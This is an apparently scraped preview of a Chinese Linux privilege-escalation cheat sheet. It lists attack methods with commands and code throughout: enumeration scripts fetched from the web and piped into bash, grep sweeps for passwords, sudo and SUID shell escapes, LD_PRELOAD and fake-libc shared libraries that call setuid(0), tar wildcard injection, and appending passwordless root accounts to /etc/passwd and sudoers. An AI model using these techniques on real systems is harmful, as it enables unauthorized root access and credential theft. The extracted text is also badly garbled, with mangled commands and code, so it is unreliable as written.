2021Linux提權(quán)技術(shù)分析_第1頁
2021Linux提權(quán)技術(shù)分析_第2頁
2021Linux提權(quán)技術(shù)分析_第3頁
2021Linux提權(quán)技術(shù)分析_第4頁
2021Linux提權(quán)技術(shù)分析_第5頁
已閱讀5頁,還剩5頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

LinuxLinuxLinuxLinux提權(quán)輔密碼計(jì)劃任Cronsystemdtimers內(nèi)核漏洞內(nèi)核提權(quán)漏洞(依靠EXP)內(nèi)核漏洞搜集項(xiàng)?:常?漏洞:利?sudo命令利?SUID提權(quán)GTFOBins通配符利?可寫?件(敏感?件)寫/etc/passwd寫/etc/sudoersNFS權(quán)限壓縮共享庫利?ldconfig利?RPATH敏感的GroupDockerLXC/LXD輔輔\h三個(gè)?作模式可選:l0(缺省),顯?特別重要的信息l1顯?ineeting的信息l2顯?所有的信息wgetwget"/diego-treitos/linux-smart-enumeration/raw/master/lse.sh"-Olse.sh;chmod700curl"/diego-treitos/linux-smart-enumeration/raw/master/lse.sh"-Lolse.sh;chmod700單?執(zhí)?:bash<(wget-q-O-/diego-treitos/linusmarenumeration/master/lse.sh)l2ibash<(curlssmarenumeration/master/lse.sh)l1i\hLinEnum常?命令:./LinEnum.sh-rreport-e/tmp/-t?成的結(jié)果將導(dǎo)出到/tmp/report?件如果什么都不加的話,就是輸出到標(biāo)準(zhǔn)輸出\hBeRootProjectpythonberoot.py--passwordsuper_strong_password這個(gè)?具包含了\hGTFOBins所提到的?件列表,也就是說,可以檢查出?些通過sudo運(yùn)?即可提權(quán)的?件。\hPupy基于python的內(nèi)存態(tài)后滲透利?框架密碼密碼相關(guān)查找包含密碼的?件(關(guān)鍵字password)grepgrep--color=auto-rnw'/'-ie"PASSWORD"--color=always2>/dev/nullfind.-typef-execgrep-i-I"PASSWORD"{}/dev/null\;查看過期的密碼pam_cracklib會(huì)保存過期的密碼記錄在/etc/security/opasswd?件中。查看??最后編輯的?件11 find/-mmin-102>/dev/null|grep-Ev"^/proc"最近?分鐘編輯的?件內(nèi)存中的密碼strings/dev/memn10|grepiPASS查看敏感?件$locatepassword|$locatepassword|more/boot/grub/i386-pc/password.mod/etc/pam.d/common-password/etc/pam.d/gdm-password/etc/pam.d/gdm-password.original7 ...計(jì)劃任務(wù)檢查系統(tǒng)中存在的cron計(jì)劃任務(wù),看看是否有權(quán)限訪問和修改檢查?件內(nèi)容,看看有沒有可以提權(quán)的途徑利?\hps?具,檢查命令和?件系統(tǒng)事件./pspy64pfi10001123456789101112131415161718敏感目錄/etc/init.d/etc/cron*/etc/crontab/etc/cron.allow/etc/cron.d/etc/cron.deny/etc/cron.daily/etc/cron.hourly/etc/cron.monthly/etc/cron.weekly/etc/sudoers/etc/exports/etc/anacrontab/var/spool/cron/var/spool/cron/crontabs/rootcrontab-llsls-alh/var/spool/cron;ls-al/etc/|grepcronls-al/etc/cron*cat/etc/cron*cat/etc/at.allowcat/etc/at.denycat/etc/cron.allowcat/etc/cron.deny*cron的?志?件存儲(chǔ)為/var/log/cronlog,可以看到最近執(zhí)?的定時(shí)任務(wù)信息。相關(guān)信息:配置文件讀取路徑:/var/spool/cron/,由crontab-e進(jìn)行寫入,配置文件無需指定用戶;用戶創(chuàng)建的任務(wù)在對(duì)應(yīng)用戶名文件夾下。/etc/crontab,只能root進(jìn)行編輯,配置文件需指定用戶/etc/cron.d/,在此文件夾下創(chuàng)建定時(shí)任務(wù)文件(和/etc/crontab一樣)日志保存地址:/var/log/cron;要禁止某個(gè)用戶使用,將用戶名添加到/etc/cron.deny文件中。timers系統(tǒng)定時(shí)器,也是計(jì)劃任務(wù)的?種查詢命令:systemctllistimersall相關(guān)信息:如果想使用systemd作為定時(shí)器,需要先創(chuàng)建一個(gè)服務(wù)單元,之后再創(chuàng)建計(jì)時(shí)器單重新加載配置:systemctl daemoreloadjournalctl-umytimer查看mytimer.timer和mytimer.service的日志詳細(xì)原理:\h/Linux/2019-05/158599.htm內(nèi)核漏洞內(nèi)核漏洞內(nèi)核提權(quán)漏洞(依靠EXP)1.在exploit-db、或者其他搜索引擎上查找相關(guān)2利?\h臟2.6.22<=kernel4.8.3、4.7.9、)3.?般這種提權(quán)漏洞都是c的,需要gcc編譯gccfilename-ooutfilename。內(nèi)內(nèi)核漏洞搜集項(xiàng)?:\h/lucyoa/kernel-exploits/中?NICE~\h\h/SecWiki/linux-kernel-exploits中?NICE~常?漏洞:\h/xairy/kernel-exploits\h/Kabot/Unix-Privilege-Escalation-Exploits-Pack/常?漏洞:1.CVE-2016-5195(DirtyCow):(LinuxKernel<=3.19.0-73.8)\h/dirtycow/dirtycow.github.io/wiki/PoCs\h2.CVE-2010-3904(RDS):(LinuxKernel<=2.6.36-rc8)\h/exploits/15285/CVE-2010-4258(FullNelson):(LinuxKernel2.6.37(RedHat/Ubuntu10.04))\h/exploits/15704/CVE-2012-0056(Mempodipper):(LinuxKernel2.6.39<3.2.2(Gentoo/Ubuntux86/x64))\h/exploits/18411利利?sudo命令sudol:查看當(dāng)前??sudo?持的命令11234$sudo-lUserdemomayrunthefollowingcommandsoncrashlab:(root)NOPASSWD:/usr/bin/mysql?如以上結(jié)果列出了mysql,就可以使?sudo mysqle'\!/bin/sh'獲得?個(gè)特權(quán)或者sudourootmysqle'\!/bin/sh'最?逼的情況:igniteALL=(root)NOPASSWD:ALL使???密碼切換到ot??:sudoi、sudosu、sudosu-利?LD_PRELOAD:如果在sudoers?件(/etc/sudoers)中明確定義了LD_PRELOAD的內(nèi)容:11 Defaults env_keep+=LD_PRELOAD可以使?以下代碼,編譯共享鏈接庫gcc-fPIC-shared-oshell.soshell.c-nostartfiles//shell.c//shell.c#include<stdio.h>#include<sys/types.h>#include<stdlib.h>void_init(){unsetenv("LD_PRELOAD");setgid(0);setuid(0);10 }使?如下命令,執(zhí)?任何?進(jìn)制程序以獲得shellsudoLD_PRELOAD=<full_path_to_so_file><program>舉個(gè)例?:sudoLD_PRELOAD=/tmp/shell.sofind同時(shí)要注意其他和sudo有同樣功能的程序,?如openBSD的doas命令##/etc/doas.conf#以rootprocmappermitnopassteduasrootcmd/usr/sbin/procmapsudo_inject5.sudo_inject在/proc/sys/kernel/yama/ptrace_scope中值為0,并且當(dāng)前??有正在使?sudo運(yùn)?的進(jìn)程的時(shí)候,可以只?\hsudo_inject攻擊來濫?當(dāng)前令牌。6.如果有權(quán)限的話,可以看看后?的內(nèi)容利利?SUID提權(quán)查找具有suid權(quán)限的命令:find/userrootperm4000print2>/dev/null、find/permu=stypef2>/dev/null、find/userrootperm4000execlsldb{}\;、find/-perm-4000-typef-execls-la{}2>/dev/null\;、find/-uid0-perm-4000-typef2>/dev/null常?的?于SUID提權(quán)的程序:Nmap較舊版本的Nmap(2.02?5.21)帶有交互模式,從?允許??執(zhí)?shell命令。nmap--interactive,nmap>!sh。find:`touchtest```findtestexecwhoamifindtestexecbashp;findtestexec/bin/sh;(DC1就遇到ash?法提權(quán),但是sh可以提權(quán)的情況)findtestexecnce/bin/sh289999\;vim:直接編輯?件vim/etc/shadow,或者進(jìn)?vim后啟動(dòng)sh交互。:setshell=/bin/sh:shell或者:vimc'!sh'bash:bash-p利?less執(zhí)?命令:less/etc/passwd,!/bin/sh(已經(jīng)設(shè)置suid的sh)、(more可以)為什么可以使?SUID提權(quán):SUID代表“執(zhí)?時(shí)設(shè)置??ID”,具有該標(biāo)志位的?件在執(zhí)?時(shí),運(yùn)如果?個(gè)程序?qū)僦魇莚oot,并具有suid標(biāo)志位,其他??運(yùn)時(shí)uid會(huì)臨時(shí)變?yōu)閞oot。構(gòu)造?個(gè)具有suid的程序(如果root權(quán)限的話):給程序添加suid標(biāo)記:chmod+s文件利???的代碼做?個(gè)suid的shell////filename:suid.cintmain(void){setgid(0);setuid(0);6 }//或者intmain(void){setresui,,);11 }gcc編譯之后,chownroot:root/tmp/suid;chmod4777/tmp/suid【注意,得先把屬主改為root,之后再添加s標(biāo)志】\hGTFOBins是一個(gè)精選的Unix二進(jìn)制列表,攻擊者可以利用它來繞過本地安全限制。通過將tar與?checkpoint-action選項(xiàng)?起使?,可以在檢查點(diǎn)之后使?指定的。使?特定選項(xiàng)的“欺騙”根源?常簡單就是通配符派上?場的地?。1123456touch--"--checkpoint=1"touch--"--checkpoint-action=exec=shshell.sh"echo"#\!/bin/bash\ncat/etc/passwd>/tmp/flag\nchmod777/tmp/flag">shell.sh#vulnerablescripttarcfarchive.tar*詳細(xì)原理請(qǐng)看《關(guān)于通配符提權(quán)》的筆記。利?可寫?件(敏感?件)利??具:\hwildpwn(其實(shí)就是將創(chuàng)建?件?動(dòng)化了)利?可寫?件(敏感?件)搜索可寫?件find/find/-writable!-user\`whoami\`-typef!-path"/proc/*"!-path"/sys/*"-execls-al{}\;2>/dev/nullfind/-perm-2-typef2>/dev/nullfind/!-path"*/proc/*"-perm-2-typef-print2>/dev/null?成密碼的?式?成?成密碼字符串的三種?式:opensslopensslpasswd-1-saltmkpasswd-mSHA-512密碼python2-c'importcrypt;printcrypt.crypt("密碼"$6$salt")'按照如下格式添加到/etc/passwd?件中用戶名:生成的密碼:0:0:Hacker:/root:/bin/bash不?成密碼的?式(及其暴?)echoecho'dummy::0:0::/root:/bin/bash'>>/etc/passwdsu-dummyBSD系統(tǒng)中文件名稱為:/etc/pwd.db、/etc/master.passwd、/etc/spwd.db12345echo"用戶名ALL=(ALL:ALL)ALL">>/etc/sudoers#useSUDOwithoutpasswordecho"用戶名ALL=(ALL)NOPASSWD:ALL">>/etc/sudoersecho"用戶名ALL=NOPASSWD:/bin/bash">>/etc/sudoersNFSNFS權(quán)限壓縮不知道是不是這么翻譯NFS的配置?件:/etc/exports如果`no_root_squash出現(xiàn)在配置?件中的話,如果?錄分享者是root,那么對(duì)于遠(yuǎn)程掛載??來說,他也具有了該?錄下root的權(quán)限。具體操作:查看遠(yuǎn)程主機(jī)共享的?件夾:showmount-e0、建??錄、掛載遠(yuǎn)程主機(jī)共享?件mkdirmkdir/tmp/nfsdirmount-tnfs0:/shared/tmp/nfsdircd/tmp/nfsdir惡意利?:112345#copywantedshellcp/bin/bash.#setsuidpermissionchmod+sbash共享共享系統(tǒng)識(shí)別共享庫的順序:rpath-link選項(xiàng)中指定的?錄?rpath選項(xiàng)中指定的?錄LD_LIBRARY_PATH或中的?錄/lib、/usr/lib/etc/ld.so.conf下的?錄。利利識(shí)別程序所使?的動(dòng)態(tài)鏈接庫信息(實(shí)際是需要同名替換)ldd二進(jìn)制文件編譯?個(gè)同名為vulnlib.so的?件,進(jìn)?替換(這個(gè)地?不確定要不要加版本號(hào))gccgcc–Wall–fPIC–shared–ovulnlib.so/tmp/vulnlib.cecho"/tmp/">/etc/ld.so.conf.d/exploit.conf&&ldconfig-l/tmp/vulnlib.so/opt/binary后面的數(shù)字作為版本號(hào),連接器并不識(shí)別后面的內(nèi)容,只識(shí)別到so命名規(guī)范的話主版本號(hào):不同的版本號(hào)之間不兼容次版本號(hào):增量升級(jí)向后兼容發(fā)行版本號(hào):對(duì)應(yīng)次版本的錯(cuò)誤修正和性能提升,不影響兼容性利?利?查看程序使?RPATH情況:readelf-d文件名|egrep"NEEDED|RPATH"根據(jù)上邊的結(jié)果,在/var/tmp/flag15路徑下構(gòu)造惡意共享庫gcc-fPIC-shared-static-libgcc-Wl,--version-script=version,-Bstaticexploit.c-olibc.so.6#include<stdlib.h>#include<stdlib.h>#defineSHELL"/bin/sh"345678910intlibc_start_main(int(*main)(int,char**,char**),intargc,char**ubp_av,void(*init)(void),void(*fini)(void),void(*rtld_fini)(void),void(*stack_end)){charfile=SHEL;char*argv[]={SHELL,0};setresuid(geteuid(),geteuid(),geteuid());execve(file,argv,0);}敏感敏感的Docker僅作記錄,docker組后期好像權(quán)限沒那么?了以root權(quán)限掛載?件系統(tǒng)$>dockerrun$>dockerrun-it--rm-v$PWD:/mntbash$>echo'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh'>>/mnt/etc/passwd類似的權(quán)限,但是可以看到主機(jī)上運(yùn)?的進(jìn)程和連接的?卡dockerrun-rmit-pid=host-net

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論